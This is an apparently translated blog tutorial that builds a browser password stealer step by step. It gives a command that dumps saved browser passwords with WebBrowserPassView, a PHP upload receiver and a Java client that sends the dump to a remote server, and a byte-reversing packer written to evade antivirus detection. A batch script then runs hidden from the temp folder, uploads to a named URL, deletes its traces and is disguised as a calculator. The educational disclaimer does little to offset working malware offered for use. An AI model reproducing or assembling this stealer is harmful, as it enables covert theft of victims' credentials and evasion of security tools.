How to steal passwords without special knowledge

1. Foreword

This material is prepared for educational purposes , to show simple and possibly interesting things, as well as how to easily create a relatively powerful tool for your needs.



I am an ordinary student and all that will be in this article is my personal best practices and experience.

2. Introduction

All those people who save their passwords in browsers are in great danger, because it seems very easy to log into another person’s computer and gain access to many web services. The same social networks and mail, and there is already a sea of ​​opportunities. Yes, 2-step verification is developing rapidly, but still.



In fact, everything is really not complicated. Passwords are stored in a separate file, which is encrypted and can only be read on the machine on which it was created. So just picking it up for yourself and using it does not work, you have to pull out the passwords from there. Next, you will need to somehow deliver them.



There is a good program - WebBrowserPassView , which just allows you to pull out passwords, and work will boil in the circle of it.

3. WebBrowserPassView

This program has both a graphical interface and command line support. However, the latter has been disabled since version 1.56. For obvious reasons, we need a command line, for this we are looking for an older version. And here will be the first chip.



I found such a version, but an exe-shnik is downloaded, which I don’t want to run well, you never know what it will do. Therefore, we take 7z and open it as an archive







Tadam, we see WebBrowserPassView files and something else that we do not need. We get the necessary, and the exe-shnik itself is boldly deleted.



Now we can run the program from the console in this way:

start WebBrowserPassView.exe /stext file
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

With the / stext option, it will save all the data in text to the specified file (the file does not have to be with the extension .txt).



A complete list of teams can be found on the official website

4. Sending a file to the server

4.1 Hosting

We already know how to get passwords and save them to a file, it was not difficult. Now you need to somehow pick them up. To do this, at least you need a server with a static ip. I tried virtual servers from Amazon and the like, but in this case we need to write a server application, maybe pay (Amazon charges for a static ip). To make a server from your home computer is not very suitable both in terms of security and reliability.



In this case, I chose a free website hosting. Absolutely free and always online.

I used zzz.com.ua , but you can try what you want.

4.2 Server

I’m not very programmer, I know dos and java from the amateur level from languages, but you don’t even need this, because all ready-made solutions have been on the network for a long time and it is very easy to find them.

Our task is to combine many simple and already created things into something unique.

So feel free to take the code from some forum and use it.



The server will be in php , the client in java (far from the best solution, in C ++ or pyton it would be many times more effective, and not everyone has it installed, but here is my personal feature)



Server Code:

 <?php $target_path = "uploads/"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo "The file ". basename( $_FILES['uploadedfile']['name'])." has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } ?>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

We put all this into the .php file and throw it in the root directory of the site. We also create the uploads folder where everything will be loaded. (it can be changed in the second line of code).

This completes the work with the server, proceed to the client.

4.3 Customer

And so, looking ahead, I’ll say that we will save the password file to the system’s temporary folder

 %temp%
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

We will send by http request. The code indicates that we are sending a picture, but do not pay attention to it.

 import java.io.FileInputStream; import java.io.InputStream; import java.io.OutputStream; import java.net.URL; import java.net.URLConnection; import java.text.SimpleDateFormat; import java.util.Date; import java.util.Random; public class MAAm { private final String CrLf = "\r\n"; private static String path = ""; private static String urll =""; private String filename = "" + new Random().nextInt(); public static void main(String[] args) { path = args[0]; urll = args[1]; MAAm main = new MAAm(); main.httpConn(); } private void httpConn() { try { SimpleDateFormat dateFormat = new SimpleDateFormat("dd.MM.yyyy 'at' HH:mm:ss z"); filename = (System.currentTimeMillis() + " (" + dateFormat.format(new Date()) + ") " + System.getProperty("user.name") + " [" + System.getProperty("user.country") + "]") + ".txt"; // ,        } catch (Exception e) { } System.out.println("filename: " + filename); System.out.println(path); URLConnection conn = null; OutputStream os = null; InputStream is = null; try { URL url = new URL(urll); System.out.println("url:" + url); conn = url.openConnection(); conn.setDoOutput(true); String postData = ""; InputStream imgIs = new FileInputStream(path); // InputStream imgIs = getClass().getResourceAsStream("/1.jpg"); byte[] imgData = new byte[imgIs.available()]; imgIs.read(imgData); String message1 = ""; message1 += "-----------------------------4664151417711" + CrLf; message1 += "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"" + filename + "\"" + CrLf; message1 += "Content-Type: image/jpeg" + CrLf; message1 += CrLf; // the image is sent between the messages in the multipart message. String message2 = ""; message2 += CrLf + "-----------------------------4664151417711--" + CrLf; conn.setRequestProperty("Content-Type", "multipart/form-data; boundary=---------------------------4664151417711"); // might not need to specify the content-length when sending chunked // data. conn.setRequestProperty("Content-Length", String.valueOf((message1.length() + message2.length() + imgData.length))); System.out.println("open os"); os = conn.getOutputStream(); System.out.println(message1); os.write(message1.getBytes()); // SEND THE IMAGE int index = 0; int size = 1024; do { System.out.println("write:" + index); if ((index + size) > imgData.length) { size = imgData.length - index; } os.write(imgData, index, size); index += size; } while (index < imgData.length); System.out.println("written:" + index); System.out.println(message2); os.write(message2.getBytes()); os.flush(); System.out.println("open is"); is = conn.getInputStream(); char buff = 512; int len; byte[] data = new byte[buff]; do { System.out.println("READ"); len = is.read(data); if (len > 0) { System.out.println(new String(data, 0, len)); } } while (len > 0); System.out.println("DONE"); } catch (Exception e) { e.printStackTrace(); } finally { System.out.println("Close connection"); try { os.close(); } catch (Exception e) { } try { is.close(); } catch (Exception e) { } try { } catch (Exception e) { } } } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

The path to the file is passed as the first parameter, and the site address as the second.



My file name is constructed as follows: send time in the form of milliseconds (send time in normal format) computer user name [user localization]. This seems to me enough, but you can change it if you wish.

4.4 Demonstration

As you can see, after all these actions, we calmly receive the sent files to our server.

5. Cryptography

Unfortunately, WebBrowserPassView is detected by antiviruses as a potential threat or trojan. The compressed UPX program on VirusTotal scored 41 detections. This is no good, you need to somehow mask it. And everything is disguised as very simple. Imagine a book written back to front. In general, nothing of the kind, it’s not even difficult to read it. However, the result of VirusTotal dropped to 6. Hmm, but if you take the book and replace each letter in it with the next one in alphabetical order? Caesar's code. Primitively, only 4 antiviruses have already suspected something. And if you combine these two methods? And everything is very simple, 0.



Yes, you just take the program, write it byte back to front and add a unit to each byte and it does not detect any antivirus

For this purpose I am creating another java application, but I have already created it myself from scratch.

 import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; public class alldo { public static void main(String[] args) throws IOException { File file = new File(args[0]); System.out.println(file.getPath()); InputStream in = new FileInputStream(file); ByteArrayOutputStream buffer = new ByteArrayOutputStream(); int nRead; byte[] arr = new byte[(int) file.length()]; while ((nRead = in.read(arr, 0, arr.length)) != -1) { buffer.write(arr, 0, nRead); } in.close(); for (int i = 0; i < arr.length; i++) { arr[i]--; } byte temp=0; for (int i = 0; i < arr.length/2; i++) { temp=arr[arr.length-i-1]; arr[arr.length-i-1]=arr[i]; arr[i]=temp; } OutputStream out = new FileOutputStream(file); out.write(arr); out.flush(); out.close(); } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

Here the only parameter is accepted - the path to the file. In order to decrypt the file - just replace

 arr[i]--;
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

on

 arr[i]++;
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

6. Bat to exe converter

Bat to exe converter is a great tool not only for converting .bat files to .exe, but also for various actions on them. From installing the application icon to including other files in the file (which will help us a lot).

7. Assembly

7.1 setup

In short - we drop WebBrowserPassView there, the decryptograph and the application to send the file to the server + we can drop there, for example, a calculator. What would the victim think that launches it. We also set the icon, write a description of the program, enable compression, check the box in the temporary directory, the rest is according to the situation.



Personally, I will leave the virus invisible, without masking and launching any application.











Everything you need to build is ready, now the code

 md %temp%\t234 REM      copy WebBrowserPassView.exe %temp%\t234 copy WebBrowserPassView.chm %temp%\t234 REM     java -jar decrypt.jar %temp%\t234\WebBrowserPassView.exe java -jar decrypt.jar %temp%\t234\WebBrowserPassView.chm REM   start %temp%\t234\WebBrowserPassView.exe /stext %temp%\t234\626384315253.mml REM   ping -n 2 localhost REM  2    java -jar opacha.jar %temp%\t234\626384315253.mml http://senseiseverywhere.kl.com.ua/retry.php REM     ping -n 1 localhost REM   del /Q %temp%\t234
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

We also add any icon and can fill out a product description, for solidity, so to speak.



In the end, here's what we got:

7.2 Tests

We compile, run, do not see anything, because the application runs in the background. Unless the folder appeared at a pace, and then it cleared. It is obvious that no one will ever know what happened. And if you open the virus 7z, as was done at the beginning of the article?







And here, too, nothing is clear, for compression.



Meanwhile, a new file appeared on the server in which our data

7.3 Additions

As already mentioned, you can disguise it as any application, you can add a batch file export, which, after the program is completed, will delete it, you can replace it with any system file, for example, the same calculator.

8. Conclusion

We used:

• Opening .exe as an archive
• Running a program with arguments
• Creating a free server
• Creating your own client-server network
• Primitive but effective cryptography
• Writing logic to combine all the components
• Registration

Personally, it is much more convenient and pleasant for me to study in practice, on the mistakes and problems that arise right here and now. You’re a little bit of theory, for a general understanding, and then immediately develop a project, without getting your hands on primitives, etc. Therefore, in my article there may be many shortcomings and inaccuracies, but I hope I have informed you the essence, namely:

1. Stealing someone else’s data is easy
2. Do not save passwords in the browser

Also, there was no fad about distribution, for we are for training, not harm.